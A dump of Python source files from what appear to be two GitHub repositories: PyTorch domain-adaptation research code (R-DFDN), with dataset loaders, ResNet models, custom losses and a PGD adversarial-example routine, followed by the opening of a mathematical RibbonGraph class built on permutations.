testloader = torch.utils.data.DataLoader(test_set, batch_size=args.bs, shuffle=False, num_workers=2)
nb_classes = 10
dim_inp=3*28*28 # np.prod(train_set.data.size()[1:])
elif args.dataset=='svhn':
trans = ([torchvision.transforms.Resize((28,28), interpolation=2), transforms.ToTensor()])
trans = transforms.Compose(trans)
fulltrainset = torchvision.datasets.SVHN(args.data, split='train', transform=trans, target_transform=None, download=True)
train_set, valset = _split_train_val(fulltrainset, val_fraction=0)
trainloader = torch.utils.data.DataLoader(train_set, batch_size=args.bs, shuffle=True,
num_workers=NUM_WORKERS, pin_memory=True)
validloader = torch.utils.data.DataLoader(valset, batch_size=args.bs, shuffle=False,
num_workers=NUM_WORKERS, pin_memory=True)
test_set = torchvision.datasets.SVHN(args.data, split='test', transform=trans, target_transform=None, download=True)
testloader = torch.utils.data.DataLoader(test_set, batch_size=args.bs, shuffle=False, num_workers=NUM_WORKERS)
nb_classes = 10
dim_inp=3*28*28
return trainloader, validloader, testloader, nb_classes, dim_inp
class MNISTM(torch.utils.data.Dataset):
"""`MNIST-M Dataset."""
url = "https://github.com/VanushVaswani/keras_mnistm/releases/download/1.0/keras_mnistm.pkl.gz"
raw_folder = 'raw'
processed_folder = 'processed'
training_file = 'mnist_m_train.pt'
test_file = 'mnist_m_test.pt'
def __init__(self,
root, mnist_root="data",
train=True,
transform=None, target_transform=None,
download=False):
"""Init MNIST-M dataset."""
super(MNISTM, self).__init__()
self.root = os.path.expanduser(root)
self.mnist_root = os.path.expanduser(mnist_root)
self.transform = transform
self.target_transform = target_transform
self.train = train # training set or test set
if download:
self.download()
if not self._check_exists():
raise RuntimeError('Dataset not found.' +
' You can use download=True to download it')
if self.train:
self.train_data, self.train_labels = \
torch.load(os.path.join(self.root,
self.processed_folder,
self.training_file))
else:
self.test_data, self.test_labels = \
torch.load(os.path.join(self.root,
self.processed_folder,
self.test_file))
def __getitem__(self, index):
"""Get images and target for data loader.
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
if self.train:
img, target = self.train_data[index], self.train_labels[index]
else:
img, target = self.test_data[index], self.test_labels[index]
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = Image.fromarray(img.squeeze().numpy(), mode='RGB')
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
"""Return size of dataset."""
if self.train:
return len(self.train_data)
else:
return len(self.test_data)
def _check_exists(self):
return os.path.exists(os.path.join(self.root,
self.processed_folder,
self.training_file)) and \
os.path.exists(os.path.join(self.root,
self.processed_folder,
self.test_file))
def download(self):
"""Download the MNIST data."""
# import essential packages
from six.moves import urllib
import gzip
import pickle
from torchvision import datasets
# check if dataset already exists
if self._check_exists():
return
# make data dirs
try:
os.makedirs(os.path.join(self.root, self.raw_folder))
os.makedirs(os.path.join(self.root, self.processed_folder))
except OSError as e:
if e.errno == errno.EEXIST:
pass
else:
raise
# download pkl files
print('Downloading ' + self.url)
filename = self.url.rpartition('/')[2]
file_path = os.path.join(self.root, self.raw_folder, filename)
if not os.path.exists(file_path.replace('.gz', '')):
data = urllib.request.urlopen(self.url)
with open(file_path, 'wb') as f:
f.write(data.read())
with open(file_path.replace('.gz', ''), 'wb') as out_f, \
gzip.GzipFile(file_path) as zip_f:
out_f.write(zip_f.read())
os.unlink(file_path)
# process and save as torch files
print('Processing...')
# load MNIST-M images from pkl file
with open(file_path.replace('.gz', ''), "rb") as f:
mnist_m_data = pickle.load(f, encoding='bytes')
mnist_m_train_data = torch.ByteTensor(mnist_m_data[b'train'])
mnist_m_test_data = torch.ByteTensor(mnist_m_data[b'test'])
# get MNIST labels
mnist_train_labels = datasets.MNIST(root=self.mnist_root,
train=True,
download=True).train_labels
mnist_test_labels = datasets.MNIST(root=self.mnist_root,
train=False,
download=True).test_labels
# save MNIST-M dataset
training_set = (mnist_m_train_data, mnist_train_labels)
test_set = (mnist_m_test_data, mnist_test_labels)
with open(os.path.join(self.root,
self.processed_folder,
self.training_file), 'wb') as f:
torch.save(training_set, f)
with open(os.path.join(self.root,
self.processed_folder,
self.test_file), 'wb') as f:
torch.save(test_set, f)
print('Done!')
if __name__ == '__main__':
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser(description='Predicting with high correlation features')
# Directories
parser.add_argument('--data', type=str, default='datasets/',
help='location of the data corpus')
parser.add_argument('--root_dir', type=str, default='default/',
help='root dir path to save the log and the final model')
parser.add_argument('--save_dir', type=str, default='0/',
help='dir path (inside root_dir) to save the log and the final model')
# dataset
parser.add_argument('--dataset', type=str, default='cmnist',
help='dataset name')
# Adaptive BN
parser.add_argument('--bn_eval', action='store_true',
help='adapt BN stats during eval')
# hyperparameters
parser.add_argument('--seed', type=int, default=1111,
help='random seed')
parser.add_argument('--bs', type=int, default=128, metavar='N',
help='batch size')
# meta specifications
parser.add_argument('--cuda', action='store_false',
help='use CUDA')
parser.add_argument('--gpu', nargs='+', type=int, default=[0])
args = parser.parse_args()
print('==> Preparing data..')
trainloader, validloader, testloader, nb_classes, dim_inp = get_dataset(args)
print(len(trainloader),len(validloader),len(testloader))
# for img,target in trainloader:
# print(img.shape)
# print(target)
# break
# print(img[0].shape)
# plt.plot(img[0].numpy())
# plt.show()
def imshow(img):
# img = img / 2 + 0.5
npimg = img.numpy()
plt.imshow(np.transpose(npimg,(1,2,0)))
plt.show()
dataiter = iter(trainloader)
images,labels = dataiter.next()
index=labels==1
images=images[index]
print(images.shape)#[50,1,28,28]
imshow(torchvision.utils.make_grid(images))
# print(''.join('%5s' % classes[labels[j]] for j in range(4)))
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,822
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/FALoss.py
|
import torch
import torch.nn as nn
class FALoss(nn.Module):
def __init__(self):
super(FALoss,self).__init__()
def get_sim(self,fea):
b,c,h,w = fea.shape
fea = fea.view(b,c,-1)
fea = fea.permute((0,2,1))
fea_norm = torch.norm(fea,p=2,dim=2)
fea = (fea.permute(2,1,0) / (fea_norm.permute(1,0) + 1e-6)).permute(2,1,0)
sim = torch.matmul(fea,fea.permute(0,2,1))
return sim
def forward(self,source_fea,target_fea):
source_sim = self.get_sim(source_fea)
target_sim = self.get_sim(target_fea)
FALoss = torch.mean(torch.abs(target_sim-source_sim))
return FALoss
class DiffLoss(nn.Module):
def __init__(self):
super(DiffLoss, self).__init__()
def forward(self, input1, input2):
batch_size = input1.size(0)
input1 = input1.view(batch_size, -1)
input2 = input2.view(batch_size, -1)
input1_l2_norm = torch.norm(input1, p=2, dim=1, keepdim=True).detach()
input1_l2 = input1.div(input1_l2_norm.expand_as(input1) + 1e-6)
input2_l2_norm = torch.norm(input2, p=2, dim=1, keepdim=True).detach()
input2_l2 = input2.div(input2_l2_norm.expand_as(input2) + 1e-6)
diff_loss = torch.mean((input1_l2.t().mm(input2_l2)).pow(2))
return diff_loss
if __name__ == '__main__':
pass
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,823
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/utils.py
|
import torch.nn as nn
import torch.nn.init as init
import torch
from torch.autograd import Variable
import numpy as np
import torch.autograd as autograd
import torch.nn.functional as F
from torch.nn.parameter import Parameter
from torch.nn.init import zeros_, ones_
import tqdm
class AttackPGD(nn.Module):
def __init__(self, config):
super(AttackPGD, self).__init__()
self.rand = config['random_start']
self.step_size = config['step_size']
self.epsilon = config['epsilon']
self.num_steps = config['num_steps']
def forward(self, inputs, targets, basic_net):
x = inputs.detach()
if self.rand:
x = x + torch.zeros_like(x).uniform_(-self.epsilon, self.epsilon)
for i in range(self.num_steps):
x.requires_grad_()
with torch.enable_grad():
logits = basic_net(x)
loss = F.cross_entropy(logits, targets, reduction='sum')
grad = torch.autograd.grad(loss, [x])[0]
x = x.detach() + self.step_size*torch.sign(grad.detach())
x = torch.min(torch.max(x, inputs - self.epsilon), inputs + self.epsilon)
x = torch.clamp(x, 0, 1)
return basic_net(x)
def pairing_loss(logit1, logit2, stochastic_pairing=False):
if stochastic_pairing:
exchanged_idx = np.random.permutation(logit1.shape[0])
stoc_target_logit2 = logit2[exchanged_idx]
loss = torch.sum( (stoc_target_logit2-logit1)**2 )/logit1.size()[0]
else:
loss = torch.sum( (logit2-logit1)**2 )/logit1.size()[0]
return loss
def dim_permute(h):
if len(h.size())>2:
h=h.permute(1,0,2,3).contiguous()
h = h.view(h.size(0), -1)
else:
h=h.permute(1,0).contiguous()
h = h.view(h.size(0),-1)
return h
def compute_l2_norm(h, subtract_mean=False):
h = dim_permute(h)
N = (h.size(1))
if subtract_mean:
mn = (h).mean(dim=1, keepdim=True)
h = h-mn
l2_norm = (h**2).sum()
return torch.sqrt(l2_norm)
def correlation_reg(hid, targets, within_class=True, subtract_mean=True):
norm_fn = compute_l2_norm
if within_class:
uniq = np.unique(targets)
reg_=0
for u in uniq:
idx = np.where(targets==u)[0]
norm = norm_fn(hid[idx], subtract_mean=subtract_mean)
reg_ += (norm)**2
else:
norm = norm_fn(hid, subtract_mean=subtract_mean)
reg_ = (norm)**2
return reg_
def idx2onehot(idx, n, h=1, w=1):
assert torch.max(idx).item() < n
if idx.dim() == 1:
idx = idx.unsqueeze(1)
onehot = torch.zeros(idx.size(0), n).cuda()
onehot.scatter_(1, idx, 1)
if h*w>1:
onehot = onehot.view(idx.size(0), n, 1, 1)
onehot_tensor = torch.ones(idx.size(0), n, h, w).cuda()
onehot = onehot_tensor* onehot
return onehot
def _split_train_val(trainset, val_fraction=0, nsamples=-1):
if nsamples>-1:
n_train, n_val = int(nsamples), len(trainset)-int(nsamples)
else:
n_train = int((1. - val_fraction) * len(trainset))
n_val = len(trainset) - n_train
train_subset, val_subset = torch.utils.data.random_split(trainset, (n_train, n_val))
return train_subset, val_subset
class add_gaussian_noise():
def __init__(self, std):
self.std = std
def __call__(self,x):
noise = self.std*torch.randn_like(x)
return x + noise
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,824
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/endecoder.py
|
import torch.nn as nn
import torch
class decoder(nn.Module):
def __init__(self):
super(decoder, self).__init__()
self.fc = nn.Sequential(
nn.Linear(100,588),
nn.ReLU(True)
)
self.up=nn.Sequential(
nn.Conv2d(3,16,kernel_size=3,stride=1,padding=1),
nn.ReLU(),
nn.Conv2d(16,16,3,stride=1,padding=1),
nn.ReLU(),
nn.Upsample(scale_factor=2),
nn.Conv2d(16, 16, kernel_size=3, stride=1, padding=1),
nn.ReLU(True),
)
self.out = nn.Conv2d(16,3,1)
def forward(self, x):
out = self.fc(x)
out = out.view(-1,3,14,14)
out = self.up(out)
out = self.out(out)
return out
if __name__ == '__main__':
pass
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,825
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/RDFDN.py
|
from utils import correlation_reg
from resnet_base import ResNet, MLPLayer
import torch
import torch.nn as nn
from FALoss import FALoss, DiffLoss
from endecoder import decoder
class R_DFDN(nn.Module):
def __init__(self, ):
super(R_DFDN, self).__init__()
self.inv_encoder = ResNet(depth=56, nb_filters=16, num_classes=10, bn=False, kernel_size=3, inp_channels=3, k=1,
affine=True, inp_noise=0)
self.diff_encoder = ResNet(depth=56, nb_filters=16, num_classes=10, bn=False, kernel_size=3, inp_channels=3, k=1,
affine=True, inp_noise=0)
self.tar_de = decoder()
self.classificator1 = nn.Sequential(
nn.Linear(100,100),
nn.ReLU(True),
nn.Linear(100,10)
)
self.classificator2 = nn.Sequential(
nn.Linear(100, 100),
nn.ReLU(True),
nn.Linear(100, 10)
)
self.inv_source_diff = nn.Sequential(
nn.Linear(64*7*7,100),
nn.ReLU()
)
self.inv_tar_diff = nn.Sequential(
nn.Linear(64 * 7 * 7, 100),
nn.ReLU()
)
self.cha_tar_diff = nn.Sequential(
nn.Linear(64 * 7 * 7, 100),
nn.ReLU()
)
def forward(self, sourse_input, tar_input, is_generation=True, is_train=True):
hid, source_inv = self.inv_encoder(sourse_input)
_, tar_inv = self.inv_encoder(tar_input)
source_inv_diff = self.inv_source_diff(source_inv.view(source_inv.size(0),-1))
tar_inv_diff = self.inv_tar_diff(tar_inv.view(tar_inv.size(0),-1))
_, tar_diff = self.diff_encoder(tar_input)
tar_cha_diff = self.cha_tar_diff(tar_diff.view(tar_diff.size(0),-1))
tar_rec = self.tar_de(tar_inv_diff+tar_cha_diff)
source_class = source_inv_diff
tar_class = source_inv_diff + tar_cha_diff
fc = torch.mean(source_class.view(source_class.size(0), source_class.size(1), -1), dim=2)
fc = fc.view(fc.size()[0], -1)
source_pred = self.classificator1((fc))
fc2 = torch.mean(tar_class.view(tar_class.size(0), tar_class.size(1), -1), dim=2)
fc2 = fc2.view(fc2.size()[0], -1)
tar_pred = self.classificator2((fc2))
if is_train:
return hid, source_pred,tar_pred,source_inv_diff,tar_inv_diff,tar_cha_diff,tar_rec,source_inv,tar_inv
elif is_generation:
return source_pred
else:
return tar_pred
class Loss(nn.Module):
def __init__(self):
super(Loss, self).__init__()
self.class_loss_criterion = nn.CrossEntropyLoss()
self.class_loss_criterion2 = nn.CrossEntropyLoss()
self.recognition_loss_criterion = nn.L1Loss()
self.regulazation_loss_criterion = correlation_reg
self.FA = FALoss()
self.DIFF = DiffLoss()
def forward(self, hid, source_pred,tar_pred,targets,source_inv_diff,tar_inv_diff,tar_cha_diff,tar_rec,tar_img,source_inv,tar_inv,
weight_list=[0.1,1,1,0.1,0.1,0.1]):
hid_1_loss = self.regulazation_loss_criterion(hid, targets.cpu(), within_class=True, subtract_mean=True)
s_class_loss = self.class_loss_criterion(source_pred, targets)
t_class_loss = self.class_loss_criterion2(tar_pred, targets)
t_recognition_loss = self.recognition_loss_criterion(tar_rec, tar_img)
fa_loss = self.FA(source_inv,tar_inv)
t_diff_loss = self.DIFF(tar_inv_diff,tar_cha_diff)
totol_loss = hid_1_loss * weight_list[0] + s_class_loss * weight_list[1] +t_class_loss * weight_list[2]\
+t_recognition_loss * weight_list[3]+fa_loss * weight_list[4] + t_diff_loss * weight_list[5]
return hid_1_loss, s_class_loss, t_class_loss, t_recognition_loss,fa_loss,t_diff_loss,totol_loss
if __name__ == '__main__':
pass
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,826
|
Complicateddd/R-DFDN
|
refs/heads/master
|
/models.py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
ACT = F.relu
class MLPLayer(nn.Module):
def __init__(self, dim_in=None, dim_out=None, bn=False, act=True, dropout=0., bias=True):
super(MLPLayer, self).__init__()
self.act=act
layer = [nn.Linear(dim_in, dim_out, bias=bias)]
if bn:
bn_ = nn.BatchNorm1d(dim_out)
layer.append(bn_)
self.layer = nn.Sequential(*layer)
def forward(self, x):
x=self.layer(x)
if self.act:
x = ACT((x))
return x
class CNN(nn.Module):
def __init__(self, bn=False, affine=True, num_classes=10, bias=False, kernel_size=3, inp_noise=0, VIB=False):
super(CNN, self).__init__()
self.VIB = VIB
nhiddens = [200,400,600,800]
self.inp_noise = inp_noise
self.conv1 = nn.Conv2d(3, nhiddens[0], kernel_size, 1, bias=bias)
self.bn1 = nn.BatchNorm2d(nhiddens[0], affine=affine) if bn else nn.Sequential()
self.conv2 = nn.Conv2d(nhiddens[0], nhiddens[1], 3, 1, bias=bias)
self.bn2 = nn.BatchNorm2d(nhiddens[1], affine=affine)if bn else nn.Sequential()
self.conv3 = nn.Conv2d(nhiddens[1], nhiddens[2], 3, 1, bias=bias)
self.bn3 = nn.BatchNorm2d(nhiddens[2], affine=affine) if bn else nn.Sequential()
self.conv4 = nn.Conv2d(nhiddens[2], nhiddens[3], 3, 1, bias=bias)
self.bn4 = nn.BatchNorm2d(nhiddens[3], affine=affine) if bn else nn.Sequential()
nb_filters_cur = nhiddens[3]
if self.VIB:
self.mn = MLPLayer(nb_filters_cur, 256, 'none', act=False, bias=bias)
self.logvar = MLPLayer(nb_filters_cur, 256, 'none', act=False, bias=bias)
nb_filters_cur = 256
self.fc = MLPLayer(nb_filters_cur, num_classes, 'none', act=False, bias=bias)
def forward(self, x, ret_hid=False, train=True):
if x.size()[1]==1: # if MNIST is given, replicate 1 channel to make input have 3 channel
out = torch.ones(x.size(0), 3, x.size(2), x.size(3)).type('torch.cuda.FloatTensor')
x = out*x
if self.inp_noise>0 and train:
x = x + self.inp_noise*torch.randn_like(x)
h=self.conv1(x)
x = F.relu(self.bn1(h))
x = F.max_pool2d(x, 2, 2)
x=self.conv2(x)
x = F.relu(self.bn2(x))
x=self.conv3(x)
x = F.relu(self.bn3(x))
x = F.max_pool2d(x, 2, 2)
x=self.conv4(x)
x = F.relu(self.bn4(x))
# print(x.shape)
x = nn.AvgPool2d(*[x.size()[2]])(x)
x = x.view(x.size()[0], -1)
if self.VIB:
mn = self.mn(x)
logvar = self.logvar(x)
x = reparameterize(mn,logvar)
x = self.fc(x)
if ret_hid:
return x, h
elif self.VIB and train:
return out, mn, logvar
else:
return x
class resblock(nn.Module):
def __init__(self, depth, channels, stride=1, bn='', nresblocks=1.,affine=True, kernel_size=3, bias=True):
self.depth = depth
self. channels = channels
super(resblock, self).__init__()
self.bn1 = nn.BatchNorm2d(depth,affine=affine) if bn else nn.Sequential()
self.conv2 = (nn.Conv2d(depth, channels, kernel_size=kernel_size, stride=stride, padding=1, bias=bias))
self.bn2 = nn.BatchNorm2d(channels, affine=affine) if bn else nn.Sequential()
self.conv3 = nn.Conv2d(channels, channels, kernel_size=kernel_size, stride=1, padding=1, bias=bias)
self.shortcut = nn.Sequential()
if stride > 1 or depth!=channels:
layers = []
conv_layer = nn.Conv2d(depth, channels, kernel_size=1, stride=stride, padding=0, bias=bias)
layers += [conv_layer, nn.BatchNorm2d(channels,affine=affine) if bn else nn.Sequential()]
self.shortcut = nn.Sequential(*layers)
def forward(self, x):
out = ACT(self.bn1(x))
out = ACT(self.bn2(self.conv2(out)))
out = (self.conv3(out))
short = self.shortcut(x)
out += 1.*short
return out
class ResNet(nn.Module):
def __init__(self, depth=56, nb_filters=16, num_classes=10, bn=False, affine=True, kernel_size=3, inp_channels=3, k=1, pad_conv1=0, bias=False, inp_noise=0, VIB=False): # n=9->Resnet-56
super(ResNet, self).__init__()
self.inp_noise = inp_noise
self.VIB = VIB
nstage = 3
self.pre_clf=[]
assert ((depth-2)%6 ==0), 'resnet depth should be 6n+2'
n = int((depth-2)/6)
nfilters = [nb_filters, nb_filters*k, 2* nb_filters*k, 4* nb_filters*k, num_classes]
self.nfilters = nfilters
self.num_classes = num_classes
self.conv1 = (nn.Conv2d(inp_channels, nfilters[0], kernel_size=kernel_size, stride=1, padding=pad_conv1, bias=bias))
self.bn1 = nn.BatchNorm2d(nfilters[0], affine=affine) if bn else nn.Sequential()
nb_filters_prev = nb_filters_cur = nfilters[0]
for stage in range(nstage):
nb_filters_cur = nfilters[stage+1]
for i in range(n):
subsample = 1 if (i > 0 or stage == 0) else 2
layer = resblock(nb_filters_prev, nb_filters_cur, subsample, bn=bn, nresblocks = nstage*n, affine=affine, kernel_size=3, bias=bias)
self.pre_clf.append(layer)
nb_filters_prev = nb_filters_cur
self.pre_clf = nn.Sequential(*self.pre_clf)
if self.VIB:
self.mn = MLPLayer(nb_filters_cur, 256, 'none', act=False, bias=bias)
self.logvar = MLPLayer(nb_filters_cur, 256, 'none', act=False, bias=bias)
nb_filters_cur = 256
self.fc = MLPLayer(nb_filters_cur, nfilters[-1], 'none', act=False, bias=bias)
def forward(self, x, ret_hid=False, train=True):
if x.size()[1]==1: # if MNIST is given, replicate 1 channel to make input have 3 channel
out = torch.ones(x.size(0), 3, x.size(2), x.size(3)).type('torch.cuda.FloatTensor')
out = out*x
else:
out = x
if self.inp_noise>0 and train:
out = out + self.inp_noise*torch.randn_like(out)
hid = self.conv1(out)
out = self.bn1(hid)
out = self.pre_clf(out)
fc = torch.mean(out.view(out.size(0), out.size(1), -1), dim=2)
fc = fc.view(fc.size()[0], -1)
if self.VIB:
mn = self.mn(fc)
logvar = self.logvar(fc)
fc = reparameterize(mn,logvar)
out = self.fc((fc))
if ret_hid:
return out, hid
elif self.VIB and train:
return out, mn, logvar
else:
return out
# Resnet nomenclature: 6n+2 = 3x2xn + 2; 3 stages, each with n number of resblocks containing 2 conv layers each, and finally 2 non-res conv layers
def ResNet_model(bn=False, num_classes=10, depth=56, nb_filters=16, kernel_size=3, inp_channels=3, k=1, pad_conv1=0, affine=True, inp_noise=0, VIB=False):
return ResNet(depth=depth, nb_filters=nb_filters, num_classes=num_classes, bn=bn, kernel_size=kernel_size, \
inp_channels=inp_channels, k=k, pad_conv1=pad_conv1, affine=affine, inp_noise=inp_noise, VIB=VIB)
def reparameterize(mu, logvar):
std = torch.exp(0.5*logvar)
eps = torch.randn_like(std)
return mu + eps*std
|
{"/eval.py": ["/data.py"], "/existing_methods.py": ["/models.py", "/data.py", "/utils.py"], "/train_RDFDN.py": ["/RDFDN.py", "/utils.py", "/data.py"], "/data.py": ["/utils.py"], "/RDFDN.py": ["/utils.py", "/resnet_base.py", "/FALoss.py", "/endecoder.py"]}
|
27,852
|
malikobeidin/ribbon_graph
|
refs/heads/master
|
/ribbon_graph_base.py
|
from sage.all import PermutationGroup
from permutation import Permutation, Bijection, random_permutation
from cycle import Path, EmbeddedPath, EmbeddedCycle
from spherogram.links.random_links import map_to_link, random_map
from random import choice
import itertools
class RibbonGraph(object):
"""
A RibbonGraph consists of a pair of permutations on a set of labels.
Each label corresponds to a half-edge, and the permutations 'opposite' and
'next' determine how the half-edges are connected to one another.
'opposite' determines which half-edge is on the opposite side of the same
edge. 'next' determines which half-edge is the next counterclockwise
half-edge on the same vertex.
"""
def __init__(self, permutations=[], PD = []):
if permutations:
opposite, next = permutations
if PD:
opposite, next = self._permutations_from_PD(PD)
self.opposite = opposite
self.next = next
def __repr__(self):
return "RibbonGraph with {} half-edges and {} vertices".format(self.size(), len(self.vertices()))
def _permutations_from_PD(self, PD):
edge_dict = {}
for n,v in enumerate(PD):
for m,label in enumerate(v):
if label in edge_dict:
edge_dict[label].append((n,m))
else:
edge_dict[label] = [(n,m)]
positions = []
for l in edge_dict.values():
positions.extend(l)
opposite_list = [[positions.index(pair)+1 for pair in edge_dict[label]] for label in edge_dict ]
next_list = []
for n,v in enumerate(PD):
cycle = []
for m,label in enumerate(v):
cycle.append(positions.index((n,m))+1)
next_list.append(cycle)
opposite = Permutation(dictionary={},cycles = opposite_list)
next = Permutation(dictionary={},cycles = next_list)
return opposite,next
def _vertex_search(self, label):
"""
Starting with an oriented half edge label, perform a breadth first
search of all the vertices to give a canonical ordering of the vertices
and a choice of oriented half edge for each vertex
"""
all_seen_edges = set()
first_edges = []
stack = []
stack.append(label)
num_labels = self.size()
while stack and len(all_seen_edges) < num_labels:
oriented_edge = stack.pop()
if oriented_edge not in all_seen_edges:
first_edges.append(oriented_edge)
for label in self.vertex(oriented_edge):
all_seen_edges.add(label)
stack.append(self.opposite[label])
return first_edges
def _cache_next_corner(self):
self.next_corner = self.opposite * self.next.inverse()
def next_corner(self):
"""
next_corner is the permutation that determines the faces of the
ribbon_graph. The permutation records the order of labels around
a face, oriented so that the face is to the left of the sequence
of half edge labels.
"""
return self.opposite * self.next.inverse()
def connected_component(self, label):
"""
Return all labels in the connected component of label. That is, all
labels which can be reached by applying the permutations opposite and
next.
"""
verts = self._vertex_search(label)
return set([l for v in verts for l in self.vertex(v)])
def connected_components(self):
"""
Return all connected components.
"""
labels = self.next.labels()
conn_comps = []
while labels:
label = labels.pop()
comp = self.connected_component(label)
labels = labels-comp
conn_comps.append(comp)
return conn_comps
def restricted_to_connected_component_containing(self, label):
"""
Return a RibbonGraph (not just a set of labels) corresponding to the
connected component containing label.
"""
comp = self.connected_component(label)
new_op = self.opposite.restricted_to(comp)
new_next = self.next.restricted_to(comp)
return RibbonGraph([new_op, new_next])
def connected_components_as_ribbon_graphs(self):
label_choices = [c.pop() for c in self.connected_components()]
return [self.restricted_to_connected_component_containing(l) for l in label_choices]
def _relabeling_bijection(self, label):
i = 1
bij = {}
for oriented_edge in self._vertex_search(label):
for e in self.vertex(oriented_edge):
bij[e]=i
i += 1
return Bijection(bij)
def relabeled_by_root(self, label):
"""
Change the labels so that they are ordered in a canonical way from
RibbonGraph._vertex_search starting at label.
"""
bij = self._relabeling_bijection(label)
new_op = self.opposite.relabeled(bij)
new_next = self.next.relabeled(bij)
return RibbonGraph([new_op, new_next])
def rooted_isomorphism_signature(self, label):
"""
Returns a list of information which determines the RibbonGraph up to
rooted isomorphism with root label. That is to say, if another
RibbonGraph and one if its edges returns the same list of information,
the two RibbonGraphs are isomorphic to each other in such a way that
the roots correspond to one another as well.
"""
edges = self.relabeled_by_root(label).edges()
return sorted([sorted(e) for e in edges])
def isomorphism_signature(self):
"""
Return a list of information which determines the isomorphism type
of the RibbonGraph.
"""
return min(self.rooted_isomorphism_signature(label) for label in self.labels())
def vertex(self, label):
"""
The vertex containing label
"""
return self.next.cycle(label)
def vertices(self):
return self.next.cycles()
def edge(self, label):
"""
The edge containing label
"""
return self.opposite.cycle(label)
def edges(self):
return self.opposite.cycles()
def face(self, label):
"""
The face containing label. The faces are oriented so that the sequence
of labels have the face to their LEFT side.
Theoretically, this could be redone so as to not compute next_corner
entirely.
"""
return self.next_corner().cycle(label)
def faces(self):
return self.next_corner().cycles()
def euler_characteristic(self):
return len(self.vertices()) - len(self.edges()) + len(self.faces())
def lace_component(self, label):
return (self.opposite*self.next*self.next).cycle(label)
def lace_components(self):
return (self.opposite*self.next*self.next).cycles()
def size(self):
return len(self.opposite)
def make_new_labels(self, num_labels):
max_int_label = 0
for j in self.labels():
try:
j_int = int(j)
if j_int > max_int_label:
max_int_label = j_int
except (ValueError, TypeError):
try:
j_int = int(max(j))
if j_int > max_int_label:
max_int_label = j_int
except:
continue
return range(max_int_label + 1, max_int_label + 1 + num_labels)
def dual(self):
"""
Return the dual RibbonGraph, i.e. the RibbonGraph where the vertices
are the faces of the original, and the edges correspond to edges of the
original.
The dual of the dual is NOT exactly the original. It is the original,
but with all of the labels switched with their opposites.
That is, the 'next' permutation has been conjugated by the 'opposite'
permutation.
"""
return RibbonGraph(permutations=[self.opposite, self.next_corner()])
def mirror(self):
"""
Return the mirror image of the RibbonGraph, which has the same edges
but in the reverse order around each vertex.
"""
return RibbonGraph(permutations=[self.opposite, self.next.inverse()])
def labels(self):
return self.opposite.labels()
def with_shuffled_labels(self):
bijection = random_permutation(self.labels())
new_opposite = self.opposite.relabeled(bijection)
new_next = self.next.relabeled(bijection)
return RibbonGraph(permutations=[new_opposite, new_next])
def relabeled(self):
labels = list(self.labels())
indices = {l:i for i,l in enumerate(labels)}
new_op = Permutation({i:indices[self.opposite[labels[i]]] for i in range(len(labels))})
new_next = Permutation({i:indices[self.next[labels[i]]] for i in range(len(labels))})
return RibbonGraph([new_op,new_next])
def disconnect_edges(self, labels):
"""
Given list of half edges, disconnect the corresponding edges.
"""
opposite_labels = set(self.opposite[label] for label in labels)
all_labels = set(labels).union(opposite_labels)
new_op = self.opposite.restricted_to(self.opposite.labels()-all_labels)
for label in all_labels:
new_op[label] = label
return RibbonGraph([new_op, self.next])
def disconnect_vertices(self, labels):
"""
Given list of half edges, pull off the labels at each vertex.
"""
label_set = set(labels)
new_next = self.next
for label in label_set:
switch_perm = Permutation({label:new_next[label],new_next[label]:label })
new_next = new_next * switch_perm
return RibbonGraph([self.opposite, new_next])
def delete_edges(self, labels):
"""
Given a list of labels, delete the entire edge that each label in the
list in on.
"""
labels = set(labels)
labels_with_opposite_labels = set()
for label in labels:
for other_label in self.edge(label):
labels_with_opposite_labels.add(other_label)
return self.delete_labels(labels_with_opposite_labels)
def delete_vertices(self, labels):
"""
Given a list of labels, delete the entire vertex that each label in the
list in on.
"""
labels = set(labels)
labels_with_next_labels = set()
for label in labels:
for other_label in self.vertex(label):
labels_with_next_labels.add(other_label)
return self.delete_labels(labels_with_next_labels)
def delete_labels(self, labels):
return self.disconnect_edges(labels).disconnect_vertices(labels).remove_labels(labels)
def connect_edges(self, pairing):
"""
Given a list of pairs of half-edge labels which are currently
disconnected (fixed points of self.opposite), connect the half-edges up.
If one of the labels is already connected, it raises an exception.
"""
connecting_permutation = Permutation(cycles=pairing)
all_labels = connecting_permutation.labels()
for label in connecting_permutation.labels():
if self.opposite[label] != label:
raise Exception("Trying to connect already connected half edge")
new_op = self.opposite.restricted_to(self.opposite.labels()-all_labels)
return RibbonGraph([new_op*connecting_permutation, self.next])
